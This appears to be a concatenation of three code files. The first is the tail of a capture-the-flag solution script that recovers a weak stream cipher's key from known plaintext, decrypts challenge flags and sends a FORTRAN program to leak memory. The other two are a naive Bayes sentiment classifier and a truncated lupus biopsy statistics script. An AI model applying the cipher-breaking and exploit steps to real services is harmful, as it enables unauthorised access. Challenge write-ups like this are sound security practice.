0x41414141, 0x41414141, 0x41414141, 0x41414141,
0x41414141, 0x41414141, 0x41414141, 0x41414141,
0x14007d41, 0x80802c19, 0x13e06a53, 0xf5af7004,
0x40b79d02, 0x3f34167b, 0x94283bed, 0xab3cd88b,
0x399ae388, 0xa825c405, 0x47e8f8a0, 0x4436ed8d,
0x0dbef722, 0x752f11bc, 0x7bf809d7, 0xf7d61652,
0x829c1ce8, 0x1926a149, 0xeb1c5b56, self.xor_const,
]
self.ecx_counter = 1
self.edx_counter = 0
# Generate the CHRISTMAS_ARRAY based on the above bytes.
self._christmas_array = []
for byte_ in self._array_bytes:
packed = struct.pack('<L', byte_)
self._christmas_array.extend(packed)
self.encrypt_array = []
# Generate the starting buffer based on the random key.
self.GenInitialChristmasArray()
def GenInitialChristmasArray(self):
"""Generate the initial state of the christmas_array."""
while self.loop_iterations:
# Hash the starting array.
self.ModifyChristmasArray(self._christmas_array)
self.loop_iterations -= 1
def GenNewChristmasArray(self):
new_arr = []
for i in range(32):
new_arr.extend(self.ModifyChristmasArray(self._christmas_array))
return new_arr
def EncryptString(self, target):
"""Encrypt a string using the current encryption scheme.
When a message is encrypted, the same general process is followed, but the
difference is that instead of each counter starting at 0 and 1, they start
at different positions, pulling data out of the array, adding, rotating and
reinserting.
"""
to_encrypt_array = list(target)
len_encrypt = len(target)
# Generate a new CHRISTMAS_ARRAY buffer. This is a 128-byte buffer that is
# generated and then used when encrypting strings. When it is exhausted, a new
# one is created.
position = 0
encrypted = []
while position < len_encrypt:
to_encrypt = to_encrypt_array[position:position+32]
for char in to_encrypt:
# If the array has been exhausted, refill it.
if not self.encrypt_array:
self.encrypt_array = self.GenNewChristmasArray()
xor_byte = self.encrypt_array.pop(0)
encrypted.append(struct.pack('<B', ord(char) ^ ord(xor_byte)))
position += 32
return struct.pack('<%dc' % len_encrypt, *encrypted)
def DecryptString(self, target):
decryped = []
for char in target:
# If the array has been exhausted, refill it.
if not self.encrypt_array:
self.encrypt_array = self.GenNewChristmasArray()
xor_byte = self.encrypt_array.pop(0)
decryped.append(ord(char) ^ ord(xor_byte))
return ''.join(chr(char) for char in decryped)
def FindEncryptionKey(self, bytes_, target):
"""Given a byte stream and its known equivalent, find the encryption key.
Take the byte stream we get back and see if we can derive the state of the
christmas_array at the time that we started encoding the first 128 bytes.
We can find this by backing into the encrypt_array used to generate the
first 128 bytes of the encrypted response (by just XOR'ing the bytes with
their known values). The resulting array can then be continuously rotated by
blocks of four bytes, stopping when one of the shifted arrays encrypts the
target string into the same byte sequence as we observed.
"""
# The usage of the xor_const at the end of the array makes brute forcing
# impossible. Therefore, reverse the encryption process.
self.encrypt_array = []
# During the first pass, the Christmas array will not be populated. Therefore
# we can derive it from the first 128 bytes.
christmas_array = []
for index, byte in enumerate(bytes_[:128]):
christmas_array.append(
struct.pack('<B', int(byte.encode('hex'), 16) ^ ord(target[index])))
# At this point, christmas_array contains the same values as
# first_christmas_array, but 'rotated' by a certain amount (since the
# starting point is determined by the position of $ecx after the original
# array is created). Since there are only 32 possible positions, iterate
# through all of them until we find the one that when used creates a matching
# hash for the first encrypted array.
# NOTE: For some reason, the answer is always found at position 124, with
# ecx_counter at 1 and eax_counter at 0. Unclear why this is as it seems
# that counter values (17, 16) should be allowed as well ( & 0xFF0 can be
# any number between 16 and 4080, step 16).
self._christmas_array = christmas_array[124:] + christmas_array[:124]
self.ecx_counter = 1
self.edx_counter = 0
if self.EncryptString(target) == bytes_:
return
print 'Incorrect crypto - exiting.'
sys.exit(1)
def FindFlagOne(self):
"""Find the first key."""
ecx = 0
edx = 31
x = 4080
while x >= 0:
observed = ListToHex(self._christmas_array[ecx*4:(ecx*4)+4])
edi = ListToHex(self._christmas_array[edx*4:(edx*4)+4])
unrotated = ROL(observed, 0x13)
unadded = unrotated - edi
if unadded < 0:
unadded = ((unrotated | 0xF00000000) - edi) & 0xFFFFFFFF
self._christmas_array[ecx*4:(ecx*4)+4] = struct.pack('<L', unadded)
ecx = 31 if ecx == 0 else ecx - 1
edx = 31 if edx == 0 else edx - 1
x -= 1
# Look for the CHRISTMAS{ marker.
if 'CHRISTMAS{' in ''.join(self._christmas_array):
flag_array = ''.join(self._christmas_array)
flag_pos = flag_array.find('CHRISTMAS{')
print flag_array[flag_pos:flag_pos+50]
break
def ModifyChristmasArray(self, buf):
"""Modify the christmas_array and return $edi."""
# ecx starts at 1 | edx starts at 0.
# Pull the values from the buffer at the positions indicated by
# self.ecx_counter and self.edx_counter.
eax_value = LittleEndian(
''.join(buf[self.ecx_counter*4:(self.ecx_counter*4)+4]))
edi_value = LittleEndian(
''.join(buf[self.edx_counter*4:(self.edx_counter*4)+4]))
# Add the two values, ignoring the carry.
edi_plus_eax = (edi_value + eax_value) & 0xFFFFFFFF
# Rotate the digits 13 places left.
rotated = ROL(edi_plus_eax, 0xd)
rotated_hex = struct.pack('<L', rotated)
# Replace the byte at self.ecx_counter*4 in buf with the rotated byte.
buf[self.ecx_counter*4:(self.ecx_counter*4)+4] = rotated_hex
# Increment the counters, resetting to 0 if either reaches 31.
self.ecx_counter = 0 if self.ecx_counter == 31 else self.ecx_counter + 1
self.edx_counter = 0 if self.edx_counter == 31 else self.edx_counter + 1
# After modifying the array, return the eax value.
return struct.pack('<L', eax_value)
def Recv(self, bytes_):
"""Read a number of bytes from the socket."""
return self._sock.recv(bytes_)
def RecvUntil(self, target):
"""Read from the socket until the target is found."""
seen = ''
while target not in seen:
seen += self._sock.recv(1)
return seen.strip()
def Send(self, payload):
"""Send a payload to the socket."""
self._sock.send(payload)
def Join(self):
"""Join the club."""
self.Send('join\n')
referral = self.Recv(4096)
assert (referral == (
'Does sir have a referral from an upstanding member of the club?\n'))
self.Send(self.flag_1)
register = self.Recv(80)
assert (register == (
'Very good sir. And what name would you like to register under?\n'))
self.Send('RocketDonkey\n')
# Receive 'Will there by anything else today, sir?\n'
received_else = self.Recv(40)
assert (received_else ==
'Will there be anything else today, sir?\n')
def Secure(self):
"""Secure the connection."""
self.Send('secure\n')
print self.RecvUntil('You *do* have your prng token to hand, sir?\n')
self.Send('But of course, Jarvis.\n')
print self.RecvUntil('Very well, sir, enabling encryption.\n')
# Decrypt the response, finding both the crypto and the first flag.
self.FindEncryptionKey(self.Recv(256), ENCRYPTED_RESPONSE)
# Find the flag (CHRISTMAS{mY_crYpt0_sucks_aNd_1_shoU1d_b3_4shaMed})
# self.FindFlagOne()
# Respond with the passphrase.
self.Send(self.EncryptString('Oh, well, tra-la-la!\n'))
# Receive 'Very good, sir.\n'
received_good = self.Recv(15)
assert received_good == self.EncryptString('Very good sir.\n')
# Receive 'Will there by anything else today, sir?\n'
received_else = self.Recv(40)
assert (received_else ==
self.EncryptString('Will there be anything else today, sir?\n'))
def Login(self):
"""Login to the server."""
self.Send(self.EncryptString('login\n'))
# 'Please provide your membership number to authenticate:'
print self.DecryptString(self.Recv(4096))
# Flag 1.
self.Send(self.EncryptString(self.flag_1))
# 'Ah, I see, sir has a basic account. In that case, your limited cloud
# execution access has been provisioned.'
print self.DecryptString(self.Recv(4096))
# 'Will there by anything else today, sir?'
print self.DecryptString(self.Recv(4096))
def Fortran(self):
"""Interact with the FORTRAN service."""
self.Send(self.EncryptString('fortran\n'))
# FORTRAN banner.
print self.DecryptString(self.Recv(4096))
# SEND PROGRAM.
print self.DecryptString(self.Recv(4096))
fortran_program = (
' DIMENSION A(47)',
' READ TAPE 1,(A(B),B=1,47)',
' 1 FORMAT (I)',
' PRINT 1,(A(1))',
' PRINT 1,(A(2))',
' PRINT 1,(A(3))',
' PRINT 1,(A(4))',
' PRINT 1,(A(5))',
' PRINT 1,(A(6))',
' PRINT 1,(A(7))',
' PRINT 1,(A(8))',
' PRINT 1,(A(9))',
' PRINT 1,(A(10))',
' PRINT 1,(A(11))',
' PRINT 1,(A(12))',
' PRINT 1,(A(13))',
' PRINT 1,(A(14))',
' PRINT 1,(A(15))',
' PRINT 1,(A(16))',
' PRINT 1,(A(17))',
' PRINT 1,(A(18))',
' PRINT 1,(A(19))',
' PRINT 1,(A(20))',
' PRINT 1,(A(21))',
' PRINT 1,(A(22))',
' PRINT 1,(A(23))',
' PRINT 1,(A(24))',
)
# Pad the output so that each line is exactly 72 characters.
fortran_program = ['{:<72s}'.format(stmt) for stmt in fortran_program]
# Add a newline.
fortran_program[-1] += '\n'
# Send the program.
self.Send(self.EncryptString(''.join(fortran_program)))
fortran_output = '\n'.join('INIT: %s' % st for st in fortran_program)
# WARMING DRUMS.
print self.DecryptString(self.Recv(18))
# Consume post-WARMING dots.
for _ in range(8):
print self.DecryptString(self.Recv(1)),
# SPOOLING TAPE.
print self.DecryptString(self.Recv(17))
# Consume post-SPOOLING dots.
for _ in range(8):
print self.DecryptString(self.Recv(1)),
# LOADING PROGRAM.
print self.DecryptString(self.Recv(17))
# Receive the response program.
program_output = self.DecryptString(self.Recv(4096))
if not self.local:
program_output += self.DecryptString(self.Recv(4096))
# Print the output plus EXECUTING PROGRAM/newlines.
program_start_offset = len(fortran_output) + 19
print program_output[:program_start_offset]
# The next 141 bytes are the bytes we need to translate.
flag_bytes = program_output[program_start_offset:program_start_offset+141]
flag = []
for byte in flag_bytes.split('\n'):
two_chars = int(byte)
flag.append(chr(two_chars & 0xFF))
flag.append(chr(two_chars >> 8))
# Print the flag.
print 'FLAG: %s' % ''.join(flag)
# This consumes up until 'Will there be anything else today sir?'.
def Elevate(self):
"""Elevate the membership (using flag_2)."""
self.Send(self.EncryptString('elevate\n'))
print self.DecryptString(self.Recv(4096))
self.Send(self.EncryptString(self.flag_2))
print self.DecryptString(self.Recv(4096))
self.Send(self.EncryptString('RocketDonkey\n'))
print self.DecryptString(self.Recv(4096))
def Secret(self):
self.Send(self.EncryptString('secret\n'))
print self.DecryptString(self.Recv(4096))
def Private(self):
"""Read the private members."""
self.Send(self.EncryptString('private\n'))
print self.DecryptString(self.Recv(4096))
print self.DecryptString(self.Recv(4096))
def main():
"""Interact with the 0wn.b33f.me Christmas challenge."""
challenge = ChristmasChallenge()
# Opening flow.
print challenge.RecvUntil('accessing sensitive services.\n')
# Join. Works fine on the server but not locally because I have no idea why.
# challenge.Join()
# Secure the connection.
challenge.Secure()
# Login.
challenge.Login()
# Fortran.
challenge.Fortran()
# Elevate.
# challenge.Elevate()
# Private.
challenge.Private()
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 15,897 | py | 11 | christmas_challenge.py | 3 | 0.645782 | 0.604894 | 0 | 478 | 32.257322 | 84 |
olicity-wong/BayesClassifier | 4,449,586,136,491 | e929b508733995ba1a4363308578f0d30f998668 | 1dcac9696e6ec3499733d8b3056cb08e80f720f2 | /bayes_realize.py | 909068c2f051a3419e703e49acffec79ca80306d | []
| no_license | https://github.com/olicity-wong/BayesClassifier | 6caf31aed98e8d6dada4429eddcff255c8463c11 | 31e82c959bcecff05a08e1d2e6c11d57d2de6d74 | refs/heads/master | 2020-05-09T17:11:20.212362 | 2019-05-30T04:30:13 | 2019-05-30T04:30:13 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
import codecs
import re
from collections import Counter
from string import digits

import jieba
import numpy as np
from numpy import *
f_root_path = 'C:/Users/91460/Desktop/论文相关/hapi/MyAll/data/'
f_scrapy_path = f_root_path + 'scrapy_data/'
f_content_path = f_root_path + 'content_data/'
f_stop_words_path = f_root_path + 'aux_data/stop_words.txt'
f_words_path = f_root_path + 'words_data/'
f_words_cut_file = f_words_path + 'word_cut_all/'
f_positive_path = f_root_path + 'aux_data/positive.txt'
f_negative_path = f_root_path + 'aux_data/negative.txt'
f_pre_path = f_root_path + 'pre_data/'
f_tt_path = f_root_path + 'tt_data/'
# 创建停用词列表
def stop_words_list(filepath):
stop_words = [line.strip() for line in open(filepath, 'r', encoding='utf-8').readlines()]
return stop_words
def common_words_list(filepath):
common_words = [line.strip() for line in open(filepath, 'r', encoding='utf-8').readlines()]
return common_words
def positive_words_list(filepath):
positive_words = [line.strip() for line in open(filepath, 'r', encoding='utf-8').readlines()]
return positive_words
def negative_words_list(filepath):
negative_words = [line.strip() for line in open(filepath, 'r', encoding='utf-8').readlines()]
return negative_words
# 数据处理
def process_data(file_path, type):
# 按行存储到列表"F:\\github\\MyAll\\xbyz_1500.txt"
f = codecs.open(file_path, 'r', encoding='utf-8')
data = f.readlines()
train_data = []
for line in data:
train_data.append(line.strip('\r\n').replace('\t', ''))
train_positive_class_list = []
train_negative_class_list = []
train_neutral_class_list = []
# 根据数值判断情感分类
for line in train_data:
if line[0] in ['4', '5']:
train_positive_class_list.append(line[1:])
if line[0] in ['3']:
train_neutral_class_list.append(line[1:])
if line[0] in ['1', '2']:
train_negative_class_list.append(line[1:])
if line[0] in ['0']:
continue
if type == "test":
global sentences_list
sentences_list = train_positive_class_list + train_negative_class_list + train_neutral_class_list
# 分词
train_positive_word_cut = word_cut(train_positive_class_list, "positive")
train_neutral_word_cut = word_cut(train_neutral_class_list, "neutral")
train_negative_word_cut = word_cut(train_negative_class_list, "negative")
# 所有句子分词集
train_all_word_cut = train_positive_word_cut + train_negative_word_cut + train_neutral_word_cut
# 分类标记集
train_all_class_list = []
for line in train_positive_word_cut:
train_all_class_list.append(2)
for line in train_negative_word_cut:
train_all_class_list.append(1)
for line in train_neutral_word_cut:
train_all_class_list.append(0)
print(train_all_word_cut)
print(train_all_class_list)
return train_all_word_cut, train_all_class_list
# Tokenisation
def word_cut(train_class_list, type):
    """Segment each sentence with jieba and filter the resulting tokens.

    Relies on module-level word lists set in __main__: stop_words,
    common_words, positive_words, negative_words.  For 'positive'
    sentences, tokens from the negative word list are also dropped (and
    vice versa for 'negative'); 'neutral' only drops stop/common words.

    :param train_class_list: sentences of one sentiment class
    :param type: 'positive', 'negative' or 'neutral'
    :return: list of token lists, parallel to train_class_list
    """
    train_word_cut_temp = []
    train_word_cut = []
    train_flag = 0
    for line in train_class_list:
        # strip punctuation
        sentence = re.sub(r'[^\w\s]', '', line)
        # strip digits
        remove_digits = str.maketrans('', '', digits)
        sentence = sentence.translate(remove_digits)
        # segment (jieba full mode with HMM); jieba.cut returns a generator
        words = jieba.cut(sentence, cut_all=True, HMM=True)
        train_word_cut_temp.append(words)
    for line in train_word_cut_temp:
        train_word_cut.append([])
        for seg in line:
            if type == 'positive':
                if seg != '\r\n' and seg not in stop_words and seg not in common_words and seg not in negative_words:
                    train_word_cut[train_flag].append(seg)
            elif type == 'negative':
                if seg != '\r\n' and seg not in stop_words and seg not in common_words and seg not in positive_words:
                    train_word_cut[train_flag].append(seg)
            else:
                if seg != '\r\n' and seg not in stop_words and seg not in common_words:
                    train_word_cut[train_flag].append(seg)
        if len(train_word_cut[train_flag]):
            train_flag += 1
            continue
        else:
            # every token was filtered out: fall back to the class name so
            # the sentence still contributes a non-empty document
            train_word_cut[train_flag].append(type)
            train_flag += 1
    return train_word_cut
# Naive Bayes model
class NBayes(object):
    """Naive Bayes text classifier over a TF-IDF weighted bag of words."""
    def __init__(self):
        self.vocabulary = []   # all distinct tokens seen during training
        self.idf = 0           # inverse document frequencies (1 x vocablen)
        self.tf = 0            # term frequencies (doclength x vocablen)
        self.tfidf = 0         # TF-IDF weight matrix of the training set
        self.tdm = 0           # class-conditional term distribution p(x|y_i)
        self.pcates = {}       # class priors p(y_i)
        self.labels = []       # class label of every training document
        self.doclength = 0     # number of training documents
        self.vocablen = 0      # vocabulary size
        self.testset = 0       # vectorised test document
    def train(self, trainset, classvec):
        """Fit priors, vocabulary, TF-IDF weights and p(x|y_i)."""
        self.calc_prob(classvec)
        self.doclength = len(trainset)
        vocab = set()
        for doc in trainset:
            vocab.update(doc)
        self.vocabulary = list(vocab)
        self.vocablen = len(self.vocabulary)
        self.calc_tfidf(trainset)
        self.calc_tdm()
    def calc_prob(self, classvec):
        """Maximum-likelihood estimate of the class priors p(y)."""
        self.labels = classvec
        total = float(len(self.labels))
        for label in set(self.labels):
            self.pcates[label] = float(self.labels.count(label)) / total
    def calc_tfidf(self, trainset):
        """Build the TF-IDF weight matrix for the training documents."""
        self.idf = np.ones([1, self.vocablen])
        self.tf = np.zeros([self.doclength, self.vocablen])
        for row, doc in enumerate(trainset):
            for token in doc:
                self.tf[row, self.vocabulary.index(token)] += 1  # bag-of-words count
            self.tf[row] /= np.sum(self.tf[row])
            for token in set(doc):
                self.idf[0, self.vocabulary.index(token)] += 1  # document frequency
        self.idf = np.log(float(self.doclength)) - np.log(self.idf)
        self.tfidf = np.multiply(self.tf, self.idf)
    def calc_tdm(self):
        """Accumulate per-class TF-IDF mass and normalise into p(x|y_i)."""
        self.tdm = np.zeros([len(self.pcates), self.vocablen])
        sumlist = np.zeros([len(self.pcates), 1])
        for row in range(self.doclength):
            label = self.labels[row]
            self.tdm[label] += self.tfidf[row]
            sumlist[label] = np.sum(self.tdm[label])
        self.tdm = self.tdm / sumlist
    def map2vocab(self, testdata):
        """Vectorise one test document as raw counts over the vocabulary."""
        self.testset = np.zeros([1, self.vocablen])
        for token in testdata:
            if token in self.vocabulary:
                self.testset[0, self.vocabulary.index(token)] += 1
    def predict(self, testset):
        """Return the label maximising sum(testset * p(x|y_i) * p(y_i))."""
        if np.shape(testset)[1] != self.vocablen:
            print('输入错误')
            exit(0)
        best_score = 0
        best_label = ''
        for cond_vect, label in zip(self.tdm, self.pcates):
            score = np.sum(testset * cond_vect * self.pcates[label])
            if score > best_score:
                best_score = score
                best_label = label
        return best_label
if __name__ == "__main__":
    # Interactive entry point: prompts for a movie name, trains on that
    # movie's training split and writes predictions for its test split.
    # The f_* path variables are presumably module-level constants defined
    # earlier in the file (not visible in this excerpt) -- confirm.
    movie = input("电影名:")
    nb = NBayes()
    f_common_path = f_words_cut_file + '%s_words_common.txt' % (movie)
    # stop words
    # NOTE: `global` at module level is a no-op; the assignments below
    # simply create the module-level names that word_cut() reads
    global stop_words
    stop_words = stop_words_list(f_stop_words_path)
    # corpus-specific common words
    global common_words
    common_words = common_words_list(f_common_path)
    # positive
    global positive_words
    positive_words = positive_words_list(f_positive_path)
    # negative
    global negative_words
    negative_words = negative_words_list(f_negative_path)
    train_data_path = f_tt_path + '%s_train.txt' % (movie)
    train_all_word_cut, train_all_class_list = process_data(train_data_path, "train")
    nb.train(train_all_word_cut, train_all_class_list)
    test_data_path = f_tt_path + '%s_test.txt' % (movie)
    test_all_word_cut, test_all_class_list = process_data(test_data_path, "test")
    save_data_path = f_pre_path + '%s_pre.txt' % (movie)
    save_data_file = open(save_data_path, 'w+', encoding='UTF-8')
    count = 0  # correct predictions
    null_count = 0  # predictions that came back empty ('')
    un_null_count = 0  # predictions that produced a label
    pre_class_list = []
    for i in range(len(test_all_word_cut)):
        nb.map2vocab(test_all_word_cut[i])
        pre_class_list.append(nb.predict(nb.testset))
        value = str(test_all_class_list[i])
        nbpredict = nb.predict(nb.testset)
        print('bayes_cal:%s' % (nbpredict), '------actual_value:%s' % (value))
        if str(nbpredict) == str(value):
            count += 1
        if str(nbpredict) == "":
            null_count += 1
        if str(nbpredict) != "":
            un_null_count += 1
            # write 'label<TAB>sentence' to the predictions file
            key_value = str(nbpredict) + '\t' + str(sentences_list[i])
            save_data_file.write(key_value)
            print(file=save_data_file)
    save_data_file.close()
    print(pre_class_list)
    print('correct_rate:', count / len(test_all_word_cut))
    print('match_correct_rate:', count / un_null_count)
    print('no_match_rate:', null_count / len(test_all_word_cut))
| UTF-8 | Python | false | false | 9,543 | py | 71 | bayes_realize.py | 6 | 0.596292 | 0.589449 | 0.00011 | 258 | 34.120155 | 117 |
ItsTheRealVictor/clicker | 11,897,059,449,184 | f4543d605884e2b1a2ce6118ed530ed783a68ea9 | 8324aa2da55d610432018e9885805663a31529b5 | /htmlFinder.py | cef3c99e2db19b23f2cce74b7a92d52453d1aa14 | []
| no_license | https://github.com/ItsTheRealVictor/clicker | d95ca1c093d4565ebdf9993b02bc2a5575d44ee9 | 1024b754ef41896f12700f26845e3924dd449c2a | refs/heads/main | 2023-08-26T17:45:50.784121 | 2021-11-01T04:37:27 | 2021-11-01T04:37:27 | 414,310,102 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from bs4 import BeautifulSoup
import requests
# Intel job-search results page ('engineering intern' query)
URL = r'https://jobs.intel.com/page/show/search-results#q=engineering%20intern&t=Jobs&sort=relevancy&layout=table'
page = requests.get(URL)  # NOTE(review): no raise_for_status(); an error page would be parsed silently
soup = BeautifulSoup(page.content, 'lxml')
# NOTE(review): this results list may be rendered client-side, so
# find_all(id='AllResults') could return [] -- verify against the raw HTML
titles = soup.find_all(id='AllResults')
print('done')
| UTF-8 | Python | false | false | 288 | py | 5 | htmlFinder.py | 5 | 0.760417 | 0.75 | 0 | 12 | 23 | 114 |
durkeems13/LN_image_analysis | 14,456,859,941,834 | 014c007cc8880be1bd036007a16922e1bb92f3ec | 011fc46b553db5a99c47ca91feb7ba39f68df961 | /HR_analysis/ss_lupus_statschecks_3classBootstrapping.py | 58338b31a07c86669a236e4235b21229fc356a95 | []
| no_license | https://github.com/durkeems13/LN_image_analysis | 5cebc5946b2d61cff4f5b70074025f0df4575433 | a71af989484809f1dc824a21d893477c14e83324 | refs/heads/main | 2023-08-10T21:35:41.557545 | 2021-09-17T04:58:33 | 2021-09-17T04:58:33 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 11 10:55:33 2020
@author: rebaabraham
"""
### Lupus single stain cellular analysis
### 3 class bootstrapping analysis
import sys
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
from scipy.stats import sem, mannwhitneyu, ks_2samp, ttest_ind
from scipy.spatial.distance import euclidean
from math import sqrt
from datetime import datetime
## Extract Accession numbers and make new column
def Extract_acc(Case_str):
    """Derive the accession number ('Sxx-yyyy') from a case/ROI name."""
    # Unify separators, upper-case any lowercase 's', then keep only the
    # first two underscore-delimited fields joined with a dash.
    normalized = Case_str.replace('-', '_').replace('s', 'S')
    return '-'.join(normalized.split('_')[:2])
## Compare list of accessions with clinical data, extract cells with matching accessions
def compare_acc(lst1, lst2, df):
    """Keep only rows of df whose 'Accession #' appears in both lists."""
    shared = set(lst1).intersection(lst2)
    mask = df['Accession #'].isin(shared)
    return df.loc[mask]
# Fx for extracting data from clinical spreadsheet, adding to the feature dfs, renaming column
def ExtractfromClin(clin_df, add_df, feat, featname):
    """Copy clinical column `feat` onto add_df as column `featname`.

    Rows are matched by 'Accession #'; a missing accession raises KeyError.
    Mutates add_df in place and returns it.
    """
    lookup = dict(zip(clin_df['Accession #'], clin_df[feat]))
    add_df[featname] = add_df['Accession #'].apply(lambda acc: lookup[acc])
    return add_df
def MakeCellDF(df, clin_dat, prob):
    """Load the per-cell CSV, filter to plausible detections, and attach the
    ESRD outcome from the clinical table.  Returns the cell DataFrame.

    :param df: path to the per-cell csv file
    :param clin_dat: clinical DataFrame with 'Accession #' and outcome column
    :param prob: minimum classifier probability to keep a detection
    """
    cell_df = pd.read_csv(df)
    # keep detections with plausible area and sufficient probability
    size_ok = (cell_df.Area < 100) & (cell_df.Area > 3)
    cell_df = cell_df[size_ok & (cell_df.Prob > prob)]
    cell_df['Accession #'] = cell_df['Case'].apply(Extract_acc)
    # drop rows whose derived accession is malformed (must start with 'S')
    cell_df = cell_df.loc[cell_df['Accession #'].str.startswith('S') == True]
    # restrict to biopsies that also appear in the clinical table
    cell_df = compare_acc(list(cell_df['Accession #'].unique()), list(clin_dat['Accession #'].unique()), cell_df)
    cell_df = ExtractfromClin(clin_dat, cell_df, 'ESRD on dialysis, transplant or cr >6 (no = 0, yes = 1)', 'ESRD')
    cell_df.rename(columns={'Unnamed: 0': 'index'}, inplace=True)
    print(cell_df.shape)
    print("Number of biopsies: "+str(len(cell_df['Accession #'].unique())))
    return cell_df
## Generate cell counts and ratios per biopsy, and per ROI
## Compare ESRD + vs -, make histograms
## look at distribution of cells per ROI in ESRD + vs -
def CellCounts(feats, Class_list, clin_dat, sd):
    """Per-biopsy cell counts, pairwise count ratios and total cell count.

    Attaches the ESRD outcome and writes the resulting table to
    sd + 'LupusBiopsy_CellCountFeats.csv'.  Returns the DataFrame.
    """
    counts = (feats.groupby(['Accession #', 'Class_id'])
                   .count()
                   .reset_index()
                   .pivot(index='Accession #', columns='Class_id', values='Area')
                   .reset_index()
                   .fillna(0))
    marker_cols = ['CD20+', 'CD11c+', 'BDCA2+', 'CD3+CD4+', 'CD3+CD4-']
    counts['total_cells'] = sum(counts[col] for col in marker_cols)
    # every ordered pair of classes contributes one ratio feature
    for numer in Class_list:
        for denom in Class_list:
            if numer == denom:
                continue
            counts[str(numer + '_to_' + denom)] = counts[numer] / counts[denom]
    # divisions by zero counts produce inf/NaN; zero them out
    counts = counts.replace([np.inf, np.NaN], [0, 0])
    ExtractfromClin(clin_dat, counts, 'ESRD on dialysis, transplant or cr >6 (no = 0, yes = 1)', 'ESRD')
    counts.to_csv(sd + 'LupusBiopsy_CellCountFeats.csv')
    return counts
def CellCountsbyROI(feats, Class_list, clin_dat):
    """Per-ROI (per image) cell counts, pairwise ratios, totals and the
    ESRD outcome.  Returns the per-ROI DataFrame (indexed by 'Case')."""
    by_roi = (feats.groupby(['Case', 'Class_id']).count()['Area']
                   .reset_index()
                   .pivot(index='Case', columns='Class_id', values='Area')
                   .reset_index()
                   .fillna(0))
    marker_cols = ['CD20+', 'CD11c+', 'BDCA2+', 'CD3+CD4+', 'CD3+CD4-']
    by_roi['total_cells'] = sum(by_roi[col] for col in marker_cols)
    # every ordered pair of classes contributes one ratio feature
    for numer in Class_list:
        for denom in Class_list:
            if numer == denom:
                continue
            by_roi[str(numer + '_to_' + denom)] = by_roi[numer] / by_roi[denom]
    # divisions by zero counts produce inf/NaN; zero them out
    by_roi = by_roi.replace([np.inf, np.NaN], [0, 0])
    by_roi['Accession #'] = by_roi['Case'].apply(Extract_acc)
    ExtractfromClin(clin_dat, by_roi, 'ESRD on dialysis, transplant or cr >6 (no = 0, yes = 1)', 'ESRD')
    return by_roi
def threeclassbootstrap_meanCI(df, ROI_list, feat, n_iter, sample_n):
    """Bootstrap the mean per-ROI value of `feat` for the three ESRD groups.

    Groups are ESRD == 0, 1 and 2 (class 2 is assigned in main() to
    patients reaching ESRD within 14 days of biopsy).  Each iteration
    draws `sample_n` ROIs per group with replacement and records the
    group means and their pairwise differences.

    :param df: per-ROI feature table with 'Case', 'ESRD' and `feat` columns
    :param ROI_list: table of ROIs ('Case') with their 'ESRD' label
    :param feat: column of df to bootstrap
    :param n_iter: number of bootstrap iterations
    :param sample_n: ROIs drawn per group per iteration
    :return: (bootstrap, final_vals) -- per-iteration means/differences,
             and overall means with 95% percentile confidence intervals

    Performance fix: the per-draw value lookup was a full DataFrame scan
    (`.loc[df['Case'] == roi].iloc[0][feat]`); values are now read from a
    {Case: value} dict built once per group.  Keeping the first occurrence
    per Case mirrors the original `.iloc[0]` behaviour.
    """
    print(feat)
    groups = (0, 1, 2)
    value_by_case = {}
    case_pool = {}
    for grp in groups:
        sub = df.loc[df['ESRD'] == grp].drop_duplicates(subset='Case', keep='first')
        value_by_case[grp] = dict(zip(sub['Case'], sub[feat]))
        case_pool[grp] = ROI_list.loc[ROI_list['ESRD'] == grp]['Case']
    means = {grp: [] for grp in groups}
    diff01 = []
    diff02 = []
    diff12 = []
    for _ in range(n_iter):
        iter_mean = {}
        for grp in groups:
            # draw with replacement in group order (0, 1, 2) per iteration,
            # so the NumPy random stream is consumed exactly as before
            drawn = np.random.choice(case_pool[grp], sample_n, replace=True)
            vals = [value_by_case[grp][case] for case in drawn]
            iter_mean[grp] = sum(vals) / len(vals)
            means[grp].append(iter_mean[grp])
        diff01.append(iter_mean[0] - iter_mean[1])
        diff02.append(iter_mean[0] - iter_mean[2])
        diff12.append(iter_mean[1] - iter_mean[2])
    mean0_feat, mean1_feat, mean2_feat = means[0], means[1], means[2]
    mean0_mean = sum(mean0_feat) / len(mean0_feat)
    mean1_mean = sum(mean1_feat) / len(mean1_feat)
    mean2_mean = sum(mean2_feat) / len(mean2_feat)
    # 95% percentile confidence intervals for each group mean ...
    CI0 = [np.percentile(mean0_feat, 2.5), np.percentile(mean0_feat, 97.5)]
    CI1 = [np.percentile(mean1_feat, 2.5), np.percentile(mean1_feat, 97.5)]
    CI2 = [np.percentile(mean2_feat, 2.5), np.percentile(mean2_feat, 97.5)]
    # ... and for each pairwise difference of group means
    CId01 = [np.percentile(diff01, 2.5), np.percentile(diff01, 97.5)]
    CId02 = [np.percentile(diff02, 2.5), np.percentile(diff02, 97.5)]
    CId12 = [np.percentile(diff12, 2.5), np.percentile(diff12, 97.5)]
    d = zip(mean0_feat, mean1_feat, mean2_feat, diff01, diff02, diff12)
    v = [mean0_mean, CI0, mean1_mean, CI1, mean2_mean, CI2, CId01, CId02, CId12]
    bootstrap = pd.DataFrame(d, columns=['mean0', 'mean1', 'mean2', 'd01', 'd02', 'd12'])
    final_vals = pd.DataFrame([v], columns=['mean0_mean', 'CI_0', 'mean1_mean', 'CI_1', 'mean2_mean', 'CI_2', 'CI_d01', 'CI_d02', 'CI_d12'])
    return bootstrap, final_vals
def main():
    """Run the 3-class (ESRD 0 / 1 / 2-at-biopsy) bootstrap analysis.

    Reads the per-cell and clinical CSVs, restricts to biopsies with >2
    years of follow-up, bootstraps mean per-ROI counts for each marker,
    and writes histograms plus a text log under --svdr.
    """
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("--df", default= "CellData_forpublication.csv", help = "path to data file (csv)")
    parser.add_argument("--clin_dat", default="ClinicalData_forpublication.csv", help= "clinical data file")
